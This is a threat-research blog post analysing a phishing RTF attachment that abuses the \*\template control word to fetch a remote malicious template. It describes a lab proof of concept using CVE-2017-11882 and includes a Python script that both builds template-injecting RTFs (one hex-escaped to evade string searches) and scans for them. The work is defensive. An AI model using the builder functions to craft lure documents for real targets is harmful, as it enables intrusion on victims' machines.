This post was authored by Fareed.
Overview
Our team analysed a malicious RTF document detected on a client's premises. The attacker had sent spearphishing emails to several of the client's mailboxes, and opening the RTF attachment would have given the attacker initial access to the victim's machine. The RTF file uses a template injection technique to retrieve a second malicious RTF file hosted on the attacker's infrastructure. When the document is opened, it is replaced with that remote RTF template, and the malicious code or object embedded in the template is executed, infecting the victim. We got a little excited at first, as we had never seen an RTF attack that came with template injection.
Template injection
MITRE describes the technique as follows: "Adversaries may abuse this technique to initially conceal malicious code to be executed via documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded." In plain terms, template injection lets an otherwise harmless document fetch a malicious template from the internet when it is opened; the remote template is loaded in place of the original document, so the victim ends up running whatever the attacker placed in the template rather than the document they received.
We usually see this technique in DOCX and XLSX files. It is far less common to find an attacker leveraging RTF for remote template injection, which is exactly what happened in this case, as discussed in the following sections.
Analysis
Our team first assumed the RTF file carried a malicious OLE object, since RTF malware in the wild typically abuses embedded OLE objects to run its code. However, running both rtfdump and rtfobj against the file returned nothing of value.
Automated analysis showed the RTF file contacting a domain name, but unfortunately that domain had been resolved to 127.0.0.1.
Knowing that the RTF file made a request to an external host, our analyst opened the file in a text editor to look for any string related to that domain name. It appears at line 14 of the file, as shown below:
According to the RTF reference at http://ftp.artifax.net/ArtRep/2.0/Help/rtf.htm, the control word "\*\template" is described as: "Destination; the argument is the name of a related template file; it must be enclosed in braces. This is a destination control word."
Reading that description, it is clear how the control word can be abused for template injection, exactly as the attacker did here: the "related template file" can be a URL rather than a local path, and the template is fetched from that URL when the document is opened.
Proof of concept
The NBS team reproduced the technique by replacing the suspicious URL with the URL of an analyst's local web server, http://192.168.48.129:8000/calc, which served a malicious RTF (acting as the template) that exploits CVE-2017-11882 to launch the calculator app.

When the RTF file is opened, it fetches the content of /calc from http://192.168.48.129:8000, loads it as the template, and the malicious code in the remote template executes. In our case, calc.exe successfully popped up!
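The following Python script is an added example, not code from the original post or from the NBS team. It ties together the two points above: it builds a minimal RTF carrying a {\*\template ...} destination that points at the same local test URL the PoC used (the document body is harmless; the remote template carries the payload), and it scans RTF bytes for that destination and classifies each target as remote or local. It also decodes \'hh hex escapes, so a URL hidden that way is still recovered, which a plain grep for "http://" would miss. The sample documents are constructed here; none of them is the file from the investigation.

```python
import re
from typing import Dict, List

# Local test URL from the PoC above; the documents built below are constructed
# for this example and are not the sample from the investigation.
TEST_URL = "http://192.168.48.129:8000/calc"


def build_template_rtf(template_url: str) -> str:
    """Minimal RTF whose {\\*\\template ...} destination points at template_url.
    This is the injection primitive: the visible body is benign text."""
    return (
        "{\\rtf1\\ansi\\deff0"
        "{\\fonttbl{\\f0 Calibri;}}"
        "{\\*\\template " + template_url + "}"
        "\\pard Please review the attached figures.\\par"
        "}"
    )


def build_hex_obfuscated_rtf(template_url: str) -> str:
    """Same document, but the URL is written as \\'hh hex escapes so that a
    string search for the scheme or host finds nothing."""
    escaped = "".join("\\'%02x" % b for b in template_url.encode("ascii"))
    return (
        "{\\rtf1\\ansi\\deff0"
        "{\\*\\template " + escaped + "}"
        "\\pard Please review the attached figures.\\par"
        "}"
    )


# {\*\template <body>}: the body runs to the closing brace. Nested groups inside
# the body are not handled by this simple matcher.
TEMPLATE_RE = re.compile(rb"\{\\\*\s*\\template\b([^{}]*)\}", re.IGNORECASE)
HEX_ESCAPE_RE = re.compile(rb"\\'([0-9a-fA-F]{2})")
CONTROL_WORD_RE = re.compile(rb"\\[a-zA-Z]+-?\d* ?")


def decode_rtf_text(body: bytes) -> str:
    """Resolve \\'hh hex escapes, drop any remaining control words, and trim
    the delimiter whitespace so the raw destination text becomes a string."""
    unescaped = HEX_ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]), body)
    stripped = CONTROL_WORD_RE.sub(b"", unescaped)
    return stripped.decode("cp1252", errors="replace").strip()


def classify_template(target: str) -> str:
    """'remote' for http(s) URLs and UNC paths, which are fetched over the
    network when the document opens; 'local' for anything else."""
    lowered = target.lower()
    if lowered.startswith(("http://", "https://", "\\\\")):
        return "remote"
    return "local"


def scan_rtf(data: bytes) -> List[Dict[str, str]]:
    """Return every template reference found in an RTF document."""
    findings = []
    for match in TEMPLATE_RE.finditer(data):
        target = decode_rtf_text(match.group(1))
        findings.append({"target": target, "kind": classify_template(target)})
    return findings


if __name__ == "__main__":
    plain = build_template_rtf(TEST_URL).encode("ascii")
    obfuscated = build_hex_obfuscated_rtf(TEST_URL).encode("ascii")
    for label, doc in (("plain", plain), ("hex-escaped", obfuscated)):
        for finding in scan_rtf(doc):
            print(f"{label}: {finding['kind']} template -> {finding['target']}")
```

Run against an attachment with `scan_rtf(open(path, "rb").read())`; any "remote" finding is worth a closer look, since rtfobj and rtfdump, which focus on embedded objects, will not report a template destination.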
Conclusion
The malicious RTF attachment was used to bait users in the client environment into opening it, giving the attacker initial access. As this post shows, RTF files can now deliver their malicious code through remote template injection rather than carrying it inline.

This method conceals the malicious code from anyone inspecting the document itself and may evade traditional anti-virus, since the template is only fetched and loaded once the victim opens the RTF file. The remote RTF template will typically carry a Microsoft Office exploit that leverages a vulnerability in the victim's environment to execute the attacker's code. Defenders can check for this by searching RTF attachments for a \*\template destination whose argument is a URL, since tools such as rtfobj and rtfdump, which look for embedded objects, returned nothing for this sample.